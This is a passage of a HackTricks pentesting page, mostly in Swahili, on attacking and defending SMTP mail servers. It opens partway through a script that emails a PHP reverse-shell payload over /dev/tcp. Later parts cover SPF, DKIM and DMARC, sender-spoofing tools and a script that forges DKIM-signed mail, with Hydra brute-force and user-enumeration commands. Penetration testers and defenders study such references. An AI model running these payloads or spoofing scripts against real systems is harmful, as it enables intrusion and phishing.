lhost = “127.0.0.1” lport = 443 rhost = “192.168.1.1” rport = 25 # 489,587

create message object instance

msg = MIMEMultipart()

setup the parameters of the message

password = “” msg[‘From’] = “attacker@local” msg[‘To’] = “victim@local” msg[‘Subject’] = “This is not a drill!”

payload

message = (“& /dev/tcp/%s/%d 0>&1'); ?>” % (lhost,lport))

print(“[*] Payload is generated : %s” % message)

msg.attach(MIMEText(message, ‘plain’)) server = smtplib.SMTP(host=rhost,port=rport)

if server.noop()[0] != 250: print(“[-]Connection Error”) exit()

server.starttls()

Uncomment if log-in with authencation

server.login(msg[‘From’], password)

server.sendmail(msg[‘From’], msg[‘To’], msg.as_string()) server.quit()

print(“[***]successfully sent email to %s:” % (msg[‘To’]))

</details>

## SMTP Smuggling

Udhaifu wa SMTP Smuggling uliwezesha kupitisha ulinzi wote wa SMTP (angalia sehemu inayofuata kwa maelezo zaidi kuhusu ulinzi). Kwa taarifa zaidi kuhusu SMTP Smuggling angalia:


<a class="content_ref" href="smtp-smuggling.md"><span class="content_ref_label">SMTP Smuggling</span></a>

## Mail Spoofing Countermeasures

Ili kuzuia barua pepe zisizoidhinishwa kutumwa kwa niaba yao, mashirika hutumia **SPF**, **DKIM**, na **DMARC**, kutokana na urahisi wa kuiga ujumbe wa SMTP.

Mwongozo kamili wa hatua hizi upo kwenye [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).

### SPF

> [!CAUTION]
> SPF [was "deprecated" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). This means that instead of creating a **TXT record** in `_spf.domain.com` you create it in `domain.com` using the **same syntax**.\
> Moreover, to reuse previous spf records it's quiet common to find something like `"v=spf1 include:_spf.google.com ~all"`

**Sender Policy Framework** (SPF) ni mekanismi inayowezesha Mail Transfer Agents (MTAs) kuthibitisha ikiwa mwenyeji anayemtuma barua pepe ameidhinishwa kwa kuuliza orodha ya seva za barua zilizoidhinishwa zinazoainishwa na mashirika. Orodha hii, ambayo inaonyesha anwani/mawigo ya IP, domain, na vyombo vingine **vimeidhinishwa kutuma barua pepe kwa niaba ya jina la kikoa**, inajumuisha "**Mechanisms**" mbalimbali katika rekodi ya SPF.

#### Mechanisms

From [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):

| Mechanism | Description                                                                                                                                                                                                                                                                                                                         |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL       | Inafanana kila wakati; inatumiwa kama matokeo ya chaguo-msingi kama `-all` kwa IP zote zisizolingana na mekanizmo zilizotangulia.                                                                                                                                                                                                   |
| A         | Ikiwa jina la kikoa lina rekodi ya anwani (A au AAAA) inayoweza kutatuliwa hadi anwani ya mtumaji, litafanana.                                                                                                                                                                                                                   |
| IP4       | Ikiwa mtumaji yuko katika anuwai ya anwani ya IPv4 iliyotajwa, itafanana.                                                                                                                                                                                                                                                           |
| IP6       | Ikiwa mtumaji yuko katika anuwai ya anwani ya IPv6 iliyotajwa, itafanana.                                                                                                                                                                                                                                                           |
| MX        | Ikiwa jina la kikoa lina rekodi ya MX inayotatua hadi anwani ya mtumaji, itafanana (yaani barua inatoka kwa mojawapo ya seva za kupokea barua za kikoa).                                                                                                                                                                          |
| PTR       | Ikiwa jina la kikoa (rekodi ya PTR) kwa anwani ya mteja liko katika kikoa kilichotajwa na jina hilo la kikoa linatatua hadi anwani ya mteja (forward-confirmed reverse DNS), litafanana. Mekanismo hii haipendekezwi na inapaswa kuepukwa, iwezekanavyo.                                                                             |
| EXISTS    | Ikiwa jina la kikoa lililotajwa linatatua hadi anwani yoyote, litafanana (bila kujali anwani inayotatua). Hii hutumika nadra. Pamoja na lugha ya macro ya SPF inatoa mechi tata zaidi kama DNSBL-queries.                                                                                                                           |
| INCLUDE   | Inarejelea sera ya kikoa kingine. Iki sera ya kikoa hicho itafanikiwa, mekanismo hii itafanikiwa. Hata hivyo, ikiwa sera iliyojumuishwa itashindwa, usindikaji unaendelea. Ili kupeana kabisa kwa sera ya kikoa kingine, lazima itumike extension ya redirect.                                                                                     |
| REDIRECT  | <p>Redirect ni kiashiria kwa jina la kikoa kingine lenye sera ya SPF; inaruhusu kikoa nyingi kushiriki sera ile ile ya SPF. Inafaa wakati ukifanya kazi na idadi kubwa ya kikoa zinashiriki miundombinu ya barua pepe ile ile.</p><p>Sera ya SPF ya kikoa iliyotajwa katika Mechanism ya redirect ndiyo itatumika.</p> |

It's also possible to identify **Qualifiers** that indicates **what should be done if a mechanism is matched**. By default, the **qualifier "+"** is used (so if any mechanism is matched, that means it's allowed).\
You usually will note **at the end of each SPF policy** something like: **\~all** or **-all**. This is used to indicate that **if the sender doesn't match any SPF policy, you should tag the email as untrusted (\~) or reject (-) the email.**

#### Qualifiers

Each mechanism within the policy may be prefixed by one of four qualifiers to define the intended result:

- **`+`**: Inalingana na matokeo ya PASS. Kwa chaguo-msingi, mekanismo hutumia qualifier hii, ikifanya `+mx` sawa na `mx`.
- **`?`**: Inawakilisha matokeo ya NEUTRAL, yanayotendewa sawa na NONE (hakuna sera maalum).
- **`~`**: Inaonyesha SOFTFAIL, ikitoa nafasi ya kati kati ya NEUTRAL na FAIL. Barua pepe zinazopata matokeo haya kwa kawaida zinakubaliwa lakini zinatambulishwa ipasavyo.
- **`-`**: Inaonyesha FAIL, ikiashiria kuwa barua pepe inapaswa kukataliwa kabisa.

In the upcoming example, the **SPF policy of google.com** is illustrated. Note the inclusion of SPF policies from different domains within the first SPF policy:
```shell-session
dig txt google.com | grep spf
google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"

dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com.               IN      TXT
_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"

dig txt _netblocks.google.com | grep spf
_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"

dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"

dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"

Hapo awali ilikuwa inawezekana spoof any domain name ambalo halikuwa na rekodi sahihi/rekodi yoyote ya SPF. Sasa, ikiwa email inatoka kutoka kwa domain bila rekodi halali ya SPF kuna uwezekano mkubwa itakatwa/itambuliwe kama isiyothibitishwa kiotomatiki.

To check the SPF of a domain you can use online tools like: https://www.kitterman.com/spf/validate.html

DKIM (DomainKeys Identified Mail)

DKIM inatumiwa kusaini emails zinazotoka, ikiruhusu Mail Transfer Agents (MTAs) za nje kuziyathibitisha kwa kupitia upokeaji wa public key ya domain kutoka DNS. Public key hii iko katika rekodi ya TXT ya domain. Ili kupata ufunguo huu, lazima ujue selector pamoja na domain name.

Kwa mfano, kuomba ufunguo, domain name na selector ni muhimu. Hivi vinaweza kupatikana katika mail header DKIM-Signature, e.g., d=gmail.com;s=20120113.

A command to fetch this information might look like:

dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3

DMARC (Uthibitishaji wa Ujumbe unaotegemea Domain, Utoaji wa Ripoti na Uzingatiaji)

DMARC huimarisha usalama wa barua pepe kwa kujenga juu ya protokoli za SPF na DKIM. Inabainisha sera zinazowaongoza seva za barua jinsi ya kushughulikia barua pepe zinazotoka kwa domain maalum, ikijumuisha jinsi ya kushughulikia kushindwa kwa uthibitisho na mahali pa kutuma ripoti kuhusu hatua za usindikaji wa barua pepe.

Ili kupata rekodi ya DMARC, unahitaji kuuliza subdomain _dmarc

# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com.	3600	IN	TXT	"v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"

# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com.	300	IN	TXT	"v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"

# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"

Lebo za DMARC

Je kuhusu subdomains?

Kutoka here.\
Unahitaji kuwa na rekodi za SPF tofauti kwa kila subdomain unayotaka kutuma barua kutoka kwake.\
Ifuatayo ilichapishwa awali kwenye openspf.org, ambayo zamani ilikuwa rasilimali nzuri kwa aina hii ya taarifa.

The Demon Question: What about subdomains?

If I get mail from pielovers.demon.co.uk, and there’s no SPF data for pielovers, should I go back one level and test SPF for demon.co.uk? No. Each subdomain at Demon is a different customer, and each customer might have their own policy. It wouldn’t make sense for Demon’s policy to apply to all its customers by default; if Demon wants to do that, it can set up SPF records for each subdomain.

So the advice to SPF publishers is this: you should add an SPF record for each subdomain or hostname that has an A or MX record.

Sites with wildcard A or MX records should also have a wildcard SPF record, of the form: * IN TXT “v=spf1 -all”

Hii inaeleweka — subdomain inaweza kabisa kuwa mahali tofauti kijiografia na kuwa na ufafanuzi wa SPF tofauti kabisa.

Open Relay

Wakati barua pepe zinapotumwa, kuhakikisha hazitambuliwi kama spam ni muhimu. Hii mara nyingi hufikiwa kupitia matumizi ya relay server inayotegemewa na mpokeaji. Hata hivyo, changamoto ya kawaida ni kwamba wasimamizi wanaweza kutokuwa na ufahamu kamili wa ni mikoa ya IP gani salama kuruhusiwa. Ukosefu huu wa uelewa unaweza kusababisha makosa katika usanidi wa server ya SMTP, hatari inayotambulika mara kwa mara katika tathmini za usalama.

Njia mbadala ambayo wasimamizi wengine hutumia ili kuepuka matatizo ya utoaji wa barua pepe, hasa linapokuja mawasiliano na wateja watarajiwa au wanaoendelea, ni kuruhusu muunganisho kutoka anwani yoyote ya IP. Hii hufanywa kwa kusanidi parameter ya server ya SMTP mynetworks ili kukubali anwani zote za IP, kama inavyoonyeshwa hapa chini:

mynetworks = 0.0.0.0/0

Kwa kuchunguza ikiwa seva ya barua pepe ni open relay (ambayo inamaanisha inaweza kupeleka barua pepe kutoka kwa chanzo chochote cha nje), zana ya nmap hutumika mara kwa mara. Inajumuisha script maalum iliyobuniwa kujaribu hili. Amri ya kufanya skana ya verbose kwenye seva (kwa mfano, yenye IP 10.10.10.10) kwenye bandari 25 kwa kutumia nmap ni:

nmap -p25 --script smtp-open-relay 10.10.10.10 -v

Vifaa

• https://github.com/serain/mailspoof Angalia mipangilio isiyo sahihi ya SPF na DMARC
• https://pypi.org/project/checkdmarc/ Pata mipangilio ya SPF na DMARC kwa otomatiki

Send Spoof Email

• https://www.mailsploit.com/index
• http://www.anonymailer.net/
• https://emkei.cz/

Au unaweza kutumia zana:

• https://github.com/magichk/magicspoofing

# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com

Warning

Iki ukipata error using in the dkim python lib wakati wa kuchambua key, jisikie huru kutumia ifuatayo.
NOTE: Hii ni suluhisho la muda tu ili kufanya ukaguzi wa haraka katika matukio ambapo kwa sababu fulani private key ya openssl haiwezi kuchambuliwa na dkim.

-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----

Au unaweza kufanya hivyo kwa mkono:

# This will send an unsigned message
mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");

# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py

import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase

# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""
<html>
<body>
<h3>This is a test, not a scam</h3>
<br />
</body>
</html>
"""
sender_domain=sender.split("@")[1]

# Prepare postfix
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")

# Generate DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
dkim_private_key = fh.read()

# Generate email
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()

# Sign email with dkim
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()

# Use local postfix relay to send email
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)

Taarifa zaidi

Pata taarifa zaidi kuhusu ulinzi huu kwenye https://seanthegeek.net/459/demystifying-dmarc/

Viashiria vingine vya phishing

• Umri wa kikoa
• Viungo vinavyoelekeza kwa anwani za IP
• Link manipulation techniques
• Viambatisho vinavyoshangaza (visivyo vya kawaida)
• Yaliyomo ya barua pepe yaliyoharibika
• Thamani zinazotumiwa zikiwa tofauti na zile za vichwa vya barua pepe
• Upo wa cheti halali na cha kuaminika cha SSL
• Kuwasilishwa kwa ukurasa kwa tovuti za kuchuja yaliyomo ya wavuti

Utoaji wa data kupitia SMTP

Ikiwa unaweza kutuma data kupitia SMTP soma hii.

Faili ya usanidi

Postfix

Kawaida, ikiwa imesakinishwa, /etc/postfix/master.cf ina scripts ambazo zitatekelezwa wakati, kwa mfano, barua mpya inapopokelewa na mtumiaji. Kwa mfano mstari flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient} una maana kwamba /etc/postfix/filtering itatekelezwa ikiwa barua mpya itapokelewa na mtumiaji mark.

Other config files:

sendmail.cf
submit.cf

Marejeleo

• https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/
• https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/
• 0xdf – HTB/VulnLab JobTwo: Word VBA macro phishing via SMTP → hMailServer credential decryption → Veeam CVE-2023-27532 to SYSTEM
• https://21ad.netlify.app/blogs/the-silent-inbox-how-verified-emails-slip-past-email-security-gateways/

HackTricks Amri za Kiotomatiki

Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
Port_Number:  25,465,587     #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html

Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25

Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}

Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}

Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587

Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}

Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V

Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.